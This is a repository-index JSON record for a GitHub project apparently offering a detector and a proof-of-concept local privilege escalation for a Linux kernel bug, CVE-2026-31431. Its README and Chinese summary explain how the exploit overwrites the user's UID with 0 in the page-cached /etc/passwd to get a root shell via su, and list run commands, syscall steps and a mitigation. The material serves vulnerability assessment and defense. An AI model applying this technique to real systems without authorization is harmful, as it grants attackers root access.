[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-943":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":16,"stars30d":17,"stars90d":15,"forks30d":15,"starsTrendScore":15,"compositeScore":18,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":21,"hasPages":19,"topics":22,"createdAt":9,"pushedAt":9,"updatedAt":23,"readmeContent":24,"aiSummary":25,"trendingCount":15,"starSnapshotCount":15,"syncStatus":16,"lastSyncTime":26,"discoverSource":27},943,"cve_2026_31431","rootsecdev\u002Fcve_2026_31431","rootsecdev","Exploit POC for CVE_2026_31431",null,"Python",562,115,5,4,0,2,20,10.19,false,"main",true,[],"2026-06-12 02:00:21","# CVE-2026-31431 (\"Copy Fail\") Toolkit\n\nDetector and proof-of-concept LPE for the Linux `algif_aead` \u002F\n`authencesn` page-cache scratch-write bug disclosed 2026-04-29.\n\nDisclosure writeup: \u003Chttps:\u002F\u002Fxint.io\u002Fblog\u002Fcopy-fail-linux-distributions>\n\n## Authorization\n\nUse only on hosts you own or are explicitly engaged to assess. The LPE\nmodifies in-memory state (page cache) but the technique is real\nprivilege escalation — running it on systems without authorization is\nillegal in most jurisdictions.\n\n## Vulnerability summary\n\n`algif_aead` runs AEAD operations in-place (`req->src == req->dst`).\nWhen the source data is fed in via `splice()` from a regular file, the\ndestination scatterlist contains references to the file's page-cache\npages — i.e. the kernel will write into them. The\n`authencesn(hmac(sha256), cbc(aes))` algorithm then performs a 4-byte\n\"scratch\" write of the AAD's `seqno_lo` field (bytes 4–7 of the\nsendmsg-supplied AAD) into that destination, corrupting the page-cache\ncopy of the file.\n\nBecause the on-disk file is never modified, there is no on-disk\nsignature; the corruption is observed only by readers that share the\npage cache. `\u002Fetc\u002Fpasswd` and `\u002Fusr\u002Fbin\u002Fsu` are both world-readable, so\nan unprivileged local user can corrupt the running kernel's view of\neither.\n\nAffected: kernels carrying commit `72548b093ee3` (in-place AEAD, 2017)\nwithout the upstream revert. The disclosure confirmed Ubuntu 24.04 LTS,\nAmazon Linux 2023, RHEL 14.3, and SUSE 16, but the underlying primitive\npredates that range.\n\n## Files\n\n| File | Purpose |\n| --- | --- |\n| `test_cve_2026_31431.py` | Non-destructive detector. Operates on a sentinel file in a temp dir; never touches system binaries. |\n| `exploit_cve_2026_31431.py` | LPE. Flips the running user's UID to 0 in `\u002Fetc\u002Fpasswd`'s page cache, then invokes `su` for a root shell. |\n\nBoth scripts are pure Python 3.10+ stdlib.\n\n## Quick start\n\n```sh\n# 1. Detect\npython3 test_cve_2026_31431.py\n#   exit 0 = not vulnerable, 2 = vulnerable, 1 = test error\n\n# 2. Exploit (interactive — su will prompt for your own password)\npython3 exploit_cve_2026_31431.py --shell\n```\n\n## Detector usage\n\n```\npython3 test_cve_2026_31431.py\n```\n\nWhat it does:\n\n1. Confirms `AF_ALG` and the `authencesn(hmac(sha256),cbc(aes))`\n   algorithm are reachable from an unprivileged process.\n2. Creates a 4 KiB sentinel file in a temp directory, populates the\n   page cache.\n3. Sends 8 bytes of AAD inline via `sendmsg`+cmsg with seqno_lo set to\n   the marker `PWND`, then `os.splice()`s 32 bytes of the sentinel's\n   page-cache page into the AF_ALG op socket.\n4. Calls `recv()` to drive decryption. The auth check fails with\n   `EBADMSG`; the scratch write fires regardless.\n5. Re-reads the file (page cache, not disk) and looks for the marker.\n\nOutput classes:\n\n- `Precondition not met` — `AF_ALG` or `authencesn` unavailable. Exit 0.\n- `VULNERABLE to CVE-2026-31431` — marker `PWND` landed in the spliced\n  page. Exit 2.\n- `Page cache MODIFIED via in-place AEAD splice path` — the page was\n  written to but the marker did not land at the expected position.\n  Treat as vulnerable. Exit 2.\n- `Page cache intact` — patched. Exit 0.\n\nThe detector never touches `\u002Fusr\u002Fbin\u002Fsu`, `\u002Fetc\u002Fpasswd`, or any other\nfile outside the temp directory it creates, and that file is removed on\nexit.\n\n## LPE usage\n\n```\npython3 exploit_cve_2026_31431.py            # patch only, print next steps\npython3 exploit_cve_2026_31431.py --shell    # patch and exec `su \u003Cuser>`\n```\n\nWhat it does:\n\n1. Looks up the running user's UID line in `\u002Fetc\u002Fpasswd` and finds the\n   byte offset of the 4-character UID field.\n2. Issues one `write4` against that offset, replacing the UID with\n   `0000`.\n3. Calls `pwd.getpwnam(user)` to confirm libc now reports UID 0.\n4. With `--shell`, `execvp(\"su\", [\"su\", user])`. Enter your own\n   password. PAM validates against `\u002Fetc\u002Fshadow` (untouched), then\n   `setuid(getpwnam(user).pw_uid)` lands at 0.\n\n### Requirements\n\n- Running user has a 4-digit UID (1000–9999). 1- to 3-digit UIDs\n  require multi-shot writes — extend `write4` accordingly.\n- No NSS caching daemon (`nscd`, `sssd`, `systemd-userdbd`) is masking\n  `\u002Fetc\u002Fpasswd` reads. If `getpwnam` still returns the real UID after\n  the patch, restart or bypass the cache, or pick a different user.\n- `\u002Fetc\u002Fpasswd` page must remain in cache between the patch and the\n  `su` exec. In practice this is reliable on any system with normal\n  memory pressure.\n\n### Reverting\n\nThe on-disk `\u002Fetc\u002Fpasswd` is unchanged.\n\n**Dry-run** (`exploit_cve_2026_31431.py` without `--shell`) auto-evicts\nthe corrupted page on exit via `POSIX_FADV_DONTNEED`, so UID→name\nlookups go back to normal immediately.\n\n**After `--shell`**, the page is left corrupted until you clear it.\nWhile it is corrupted, anything resolving UID 1000 → name (e.g. `ls`,\nfile managers, scp\u002Fsftp ownership checks) will fail or show numeric\nIDs. To clear:\n\n```sh\n# unprivileged - request page-cache eviction for \u002Fetc\u002Fpasswd:\npython3 -c \"import os; fd=os.open('\u002Fetc\u002Fpasswd', os.O_RDONLY); \\\n            os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED); os.close(fd)\"\n\n# from the root shell:\necho 3 > \u002Fproc\u002Fsys\u002Fvm\u002Fdrop_caches\n```\n\nA reboot also clears it.\n\n## How `write4` works\n\n```\nsendmsg([8-byte AAD], cmsg=[ALG_SET_OP=DECRYPT, ALG_SET_IV, ALG_SET_AEAD_ASSOCLEN=8],\n        flags=MSG_MORE)\nsplice(target_fd, pipe_w, 32, offset_src=file_offset)\nsplice(pipe_r, op_fd, 32)\nrecv(op_fd)   # EBADMSG; scratch write has already landed\n```\n\nThe 4 bytes from AAD positions 4–7 (`seqno_lo`) are written by\n`authencesn` into the destination scatterlist, which on this code path\nis the page-cache page we spliced from `target_fd`. The landing offset\nwithin the page corresponds to the `offset_src` we passed to `splice()`.\n\n## Mitigation\n\nUntil the patched kernel reaches your distro:\n\n```sh\nsudo tee \u002Fetc\u002Fmodprobe.d\u002Fdisable-algif-aead.conf \u003C\u003C\u003C'install algif_aead \u002Fbin\u002Ffalse'\nsudo rmmod algif_aead 2>\u002Fdev\u002Fnull\n```\n\nAfter applying, `test_cve_2026_31431.py` should report `Precondition\nnot met` and exit 0.\n\nThe upstream fix reverts in-place AEAD operations to out-of-place,\nkeeping page-cache pages out of writable scatterlists.\n\n## References\n\n- Xint disclosure writeup: \u003Chttps:\u002F\u002Fxint.io\u002Fblog\u002Fcopy-fail-linux-distributions>\n- CVE-2026-31431\n","该项目提供了针对CVE-2026-31431漏洞的检测工具和利用代码。其核心功能包括一个非破坏性的检测脚本`test_cve_2026_31431.py`，用于确认系统是否受此漏洞影响；以及一个提权脚本`exploit_cve_2026_31431.py`，能够将当前用户的UID修改为0从而获得root权限。这两个脚本完全基于Python 3.10+标准库编写。该工具适用于Linux系统安全评估场景，特别是对那些运行了特定版本内核（如Ubuntu 24.04 LTS、Amazon Linux 2023等）且未应用相关补丁的环境。请注意，仅应在拥有授权的情况下使用这些工具进行测试或评估。","2026-06-11 02:40:27","CREATED_QUERY"]